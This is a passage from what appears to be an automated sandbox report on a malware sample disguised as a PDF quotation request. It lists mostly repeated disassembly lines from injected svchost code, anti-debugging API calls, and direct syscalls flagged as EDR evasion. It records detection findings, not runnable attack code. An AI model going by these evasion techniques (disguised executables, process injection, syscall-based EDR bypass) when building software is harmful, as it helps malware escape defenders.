                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C38BF0 mov eax, dword ptr fs:[00000030h]7_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C38BF0 mov eax, dword ptr fs:[00000030h]7_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5EBFC mov eax, dword ptr fs:[00000030h]7_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]7_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40BBE mov eax, dword ptr fs:[00000030h]7_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40BBE mov eax, dword ptr fs:[00000030h]7_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]7_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]7_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE4B4B mov eax, dword ptr fs:[00000030h]7_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE4B4B mov eax, dword ptr fs:[00000030h]7_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC6B40 mov eax, dword ptr fs:[00000030h]7_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC6B40 mov eax, dword ptr fs:[00000030h]7_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFAB40 mov eax, dword ptr fs:[00000030h]7_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD8B42 mov eax, dword ptr fs:[00000030h]7_2_03CD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDEB50 mov eax, dword ptr fs:[00000030h]7_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2CB7E mov eax, dword ptr fs:[00000030h]7_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]7_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]7_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]7_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]7_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]7_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]7_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]7_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]7_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]7_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5EB20 mov eax, dword ptr fs:[00000030h]7_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5EB20 mov eax, dword ptr fs:[00000030h]7_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF8B28 mov eax, dword ptr fs:[00000030h]7_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF8B28 mov eax, dword ptr fs:[00000030h]7_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C86ACC mov eax, dword ptr fs:[00000030h]7_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C86ACC mov eax, dword ptr fs:[00000030h]7_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C86ACC mov eax, dword ptr fs:[00000030h]7_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C30AD0 mov eax, dword ptr fs:[00000030h]7_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C64AD0 mov eax, dword ptr fs:[00000030h]7_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C64AD0 mov eax, dword ptr fs:[00000030h]7_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6AAEE mov eax, dword ptr fs:[00000030h]7_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6AAEE mov eax, dword ptr fs:[00000030h]7_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D04A80 mov eax, dword ptr fs:[00000030h]7_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C68A90 mov edx, dword ptr fs:[00000030h]7_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C38AA0 mov eax, dword ptr fs:[00000030h]7_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C38AA0 mov eax, dword ptr fs:[00000030h]7_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C86AA4 mov eax, dword ptr fs:[00000030h]7_2_03C86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]7_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]7_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]7_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]7_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]7_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]7_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]7_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40A5B mov eax, dword ptr fs:[00000030h]7_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40A5B mov eax, dword ptr fs:[00000030h]7_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6CA6F mov eax, dword ptr fs:[00000030h]7_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6CA6F mov eax, dword ptr fs:[00000030h]7_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6CA6F mov eax, dword ptr fs:[00000030h]7_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDEA60 mov eax, dword ptr fs:[00000030h]7_2_03CDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CACA72 mov eax, dword ptr fs:[00000030h]7_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CACA72 mov eax, dword ptr fs:[00000030h]7_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBCA11 mov eax, dword ptr fs:[00000030h]7_2_03CBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6CA24 mov eax, dword ptr fs:[00000030h]7_2_03C6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5EA2E mov eax, dword ptr fs:[00000030h]7_2_03C5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C54A35 mov eax, dword ptr fs:[00000030h]7_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C54A35 mov eax, dword ptr fs:[00000030h]7_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6CA38 mov eax, dword ptr fs:[00000030h]7_2_03C6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC69C0 mov eax, dword ptr fs:[00000030h]7_2_03CC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]7_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]7_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]7_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]7_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]7_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]7_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C649D0 mov eax, dword ptr fs:[00000030h]7_2_03C649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]7_2_03CFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]7_2_03CBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C629F9 mov eax, dword ptr fs:[00000030h]7_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C629F9 mov eax, dword ptr fs:[00000030h]7_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C309AD mov eax, dword ptr fs:[00000030h]7_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C309AD mov eax, dword ptr fs:[00000030h]7_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB89B3 mov esi, dword ptr fs:[00000030h]7_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB89B3 mov eax, dword ptr fs:[00000030h]7_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB89B3 mov eax, dword ptr fs:[00000030h]7_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB0946 mov eax, dword ptr fs:[00000030h]7_2_03CB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C56962 mov eax, dword ptr fs:[00000030h]7_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C56962 mov eax, dword ptr fs:[00000030h]7_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C56962 mov eax, dword ptr fs:[00000030h]7_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C7096E mov eax, dword ptr fs:[00000030h]7_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C7096E mov edx, dword ptr fs:[00000030h]7_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C7096E mov eax, dword ptr fs:[00000030h]7_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD4978 mov eax, dword ptr fs:[00000030h]7_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD4978 mov eax, dword ptr fs:[00000030h]7_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBC97C mov eax, dword ptr fs:[00000030h]7_2_03CBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE908 mov eax, dword ptr fs:[00000030h]7_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE908 mov eax, dword ptr fs:[00000030h]7_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBC912 mov eax, dword ptr fs:[00000030h]7_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28918 mov eax, dword ptr fs:[00000030h]7_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28918 mov eax, dword ptr fs:[00000030h]7_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB892A mov eax, dword ptr fs:[00000030h]7_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC892B mov eax, dword ptr fs:[00000030h]7_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]7_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]7_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]7_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]7_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C30887 mov eax, dword ptr fs:[00000030h]7_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBC89D mov eax, dword ptr fs:[00000030h]7_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C42840 mov ecx, dword ptr fs:[00000030h]7_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C60854 mov eax, dword ptr fs:[00000030h]7_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34859 mov eax, dword ptr fs:[00000030h]7_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34859 mov eax, dword ptr fs:[00000030h]7_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBE872 mov eax, dword ptr fs:[00000030h]7_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBE872 mov eax, dword ptr fs:[00000030h]7_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC6870 mov eax, dword ptr fs:[00000030h]7_2_03CC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC6870 mov eax, dword ptr fs:[00000030h]7_2_03CC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBC810 mov eax, dword ptr fs:[00000030h]7_2_03CBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov ecx, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A830 mov eax, dword ptr fs:[00000030h]7_2_03C6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD483A mov eax, dword ptr fs:[00000030h]7_2_03CD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD483A mov eax, dword ptr fs:[00000030h]7_2_03CD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32FC8 mov eax, dword ptr fs:[00000030h]7_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32FC8 mov eax, dword ptr fs:[00000030h]7_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32FC8 mov eax, dword ptr fs:[00000030h]7_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32FC8 mov eax, dword ptr fs:[00000030h]7_2_03C32FC8
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_004238DA
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0041F250 SetUnhandledExceptionFilter,2_2_0041F250
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A208
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00417DAA

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
